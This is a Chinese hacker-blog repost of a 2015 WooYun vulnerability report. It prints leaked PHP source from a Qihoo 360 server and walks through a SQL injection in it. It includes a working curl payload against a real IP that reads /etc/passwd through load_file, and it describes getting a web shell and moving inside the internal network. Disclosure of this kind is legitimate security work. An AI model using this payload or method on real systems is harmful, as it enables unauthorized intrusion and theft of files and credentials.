记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

神器而已之奇虎360某站GETSHELL内网漫游到webscan了

2015-08-10 18:55

首先是这样一个问题:

http://220.181.150.107/web.tgz





一看就是源码啊,下下来审计一下;我猜有注入:

➜ web cat web_function.php

code 区域
<?php

$dir = dirname(__FILE__).'/';

require_once($dir."../db/db_function.php");



function verifyed($short_code, $token)

{

$state = NULL;

$pdo = connect2db();

if($pdo == NULL )

return 1;

$sql = sprintf("select * from receiver_reference_count where rev_jid='%s' and short_code='%s'", $token, $short_code);

//echo "sql:".$sql."\n";

$result = $pdo->query($sql);

if($result === NULL )

return 2;

foreach($result as $row)

{

$state = $row['state'];

}

//echo " state: ".$state;

if($state === NULL || $state === '' )

return 3;

else if($state == '0')

return 4;

return 0;

}



function get_nickname_by_short_code($short_code)

{

$jid = NULL;

$data = NULL;

$nickname = '';

$pdo = connect2db();

if($pdo == NULL )

return 1;

$sql = sprintf("select jid from short_hash_jid where short_hash = '%s'", $short_code);

//echo "sql:".$sql."\n";

$result = $pdo->query($sql);

if($result === NULL )

return 2;

foreach($result as $row)

{

$jid = $row['jid'];

}

//echo " state: ".$state;

if($jid === NULL || $jid === '' )

return 3;



$result = '';

$sql = sprintf("select name from ofUser where username='%s'", $jid);

//echo "sql:".$sql."\n";

$result = $pdo->query($sql);

if($result === NULL )

return 4;

foreach($result as $row)

{

$nickname = $row['name'];

}



//echo "name: ".$nickname.PHP_EOL;

$data = array('jid'=>$jid, 'nickname'=>$nickname);

return $data;

}



function get_play_time_by_short_code( $short_code )

{

$time = 5;

$pdo = connect2db();

if($pdo == NULL )

return $time;

$sql = sprintf("select play_time from short_hash_jid where short_hash='%s'", $short_code);

//echo "sql:".$sql."\n";

$result = $pdo->query($sql);

if($result === NULL )

return $time;

foreach($result as $row)

{

$time = $row['play_time'];

//echo "time:".$time.PHP_EOL;

}

if($time === NULL || $time === '' || $time === '0')

$time = 5;

return $time;

}

//echo verifyed('bXhRdzQWj1JYDmos',"13438299142" );

/*

$data = get_nickname_by_short_code("1dhg05myYabJI5CO");

if( !is_int($data))

{

print_r($data);

}else{

echo $data.PHP_EOL;

}*/

//echo get_play_time_by_short_code("QgHUkVoFE7mhSD9P");

?>







一看就是注入,但是按逻辑走着,入口在get.php



code 区域
<?php

$dir = dirname(__FILE__).'/';

require_once($dir."../libs/util.php");

require_once("gen_html.php");

require_once("web_function.php");



if (isset($_COOKIE["token"]))

{

$token = $_COOKIE["token"];

}

//print_r($_COOKIE);



$query_str = isset($_SERVER['QUERY_STRING']) ? getParams($_SERVER['QUERY_STRING']) : '';

//echo "query_str: ".$query_str."<br>";

parse_str($query_str, $tmpArr);

//print_r($tmpArr);

if(isset($tmpArr['s']))

{

$short_code = $tmpArr['s'];

}

//echo "short_code: ".$short_code."<br>";

//print_r($_POST);





//////////////////////////////////////////////////////////////

//for Jump the page

$mobile = $_POST['mobile'];

$post_code = $_POST['code'];

if ($mobile != '')

{

//echo "short_code=".$post_code."mobile=".$mobile;

$ret = verifyed($post_code, $mobile);



//echo "ret == ".$ret;



if ($ret == 0)

{

setcookie("token", $mobile, time()+3600, "/", null);

response_picture_html($post_code, $mobile, $dir);

exit();

}



if ($ret == 4)

{

setcookie("token", $mobile, time()+3600, "/", null);

response_ad_html($dir, $post_code);

exit();

}

response_verify_html($post_code, $dir);

exit();

}

//////////////////////////////////////////////////////////////







//print_r($_COOKIE);

$ret = verifyed($short_code, $token);

if ($ret == 0 )

{

setcookie("token", $token, time()+3600, "/", null);

response_picture_html($short_code, $token, $dir);

exit();

}





if($ret == 4)

{

response_ad_html($dir, $short_code);

exit();

}



response_verify_html($short_code, $dir);

exit();

?>





配合这个文件

code 区域
➜  web  cat gen_html.php 

<?php



$dir = dirname(__FILE__).'/';

require_once("../libs/SmartyTemplate.php");

require_once("../libs/util.php");

require_once("web_function.php");



function response_verify_html($code, $dir)

{

$tpl = 'template/verify.html.tpl';



$objSmarty = SmartyTemplate::getInstance();



$file_tpl = $dir.$tpl;

$objSmarty->assign('short_code',$code);

$url = "http://220.181.150.107/".$code.".htl";

$objSmarty->assign('thumb_src',$url);

@header('Conten-Type: text/html');

//@header('Cache-Control: no-cache, no-store, max-age=0');

@header('Cache-Control: no-cache, no-store');

@header('Pragma: no-cache');

@header('Expires: -1');







returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));

}



function response_picture_html($code, $token, $dir)

{

$tpl = 'template/picture.html.tpl';

$finish_url = "http://220.181.150.107/".$code;



$counter = get_play_time_by_short_code($code);

$objSmarty = SmartyTemplate::getInstance();



$file_tpl = $dir.$tpl;

$url = "http://220.181.150.107/".$code.".htl?jid=".$token."&type=normal";

$objSmarty->assign('img_url',$url);

$objSmarty->assign('counter',$counter);

$objSmarty->assign('finish_url',$finish_url);

@header('Conten-Type: text/html');

//@header('Cache-Control: no-cache, no-store, max-age=0');

@header('Cache-Control: no-cache, no-store');

@header('Pragma: no-cache');

@header('Expires: -1');



//writeLog($file_tpl." why22222222222222", __FILE__, __LINE__, DOWNLOAD_RUN_LOG);

returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));

}





function response_ad_html($dir, $short_code)

{

$tpl = 'template/ad.html.tpl';

$nickname = '';

$jid = '';



$data = get_nickname_by_short_code($short_code);

if( !is_int($data) )

{

$jid = $data['jid'];

$nickname = $data['nickname'];

//print_r($data);

}

$objSmarty = SmartyTemplate::getInstance();

//echo "nickname: ".$nickname." jid: ".$jid."<br>";



$file_tpl = $dir.$tpl;

$objSmarty->assign('nickname',$nickname);

$objSmarty->assign('jid',$jid);

@header('Conten-Type: text/html');

//@header('Cache-Control: no-cache, no-store, max-age=0');

@header('Cache-Control: no-cache, no-store');

@header('Pragma: no-cache');

@header('Expires: -1');





returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));

}

?>





最后得到这样一个注入点;

code 区域
curl http://220.181.150.107/web/get.php -d "mobile=13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;&code=1'  union select load_file('/etc/passwd') -- ;"





接下来,sql注入写文件,拿shell

hosts.png





内网漫游之偶遇webscan.360.cn

3689ED9B-89B5-419B-A184-3A83D7D6EA57.png





A63F1E3E-74A9-4738-90FF-FF52557F8324.png

漏洞证明:

就这样吧,点到为止,shell已删。

修复方案:

然并卵!

知识来源: www.wooyun.org/bugs/wooyun-2015-0122949

阅读:112691 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“神器而已之奇虎360某站GETSHELL内网漫游到webscan了”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云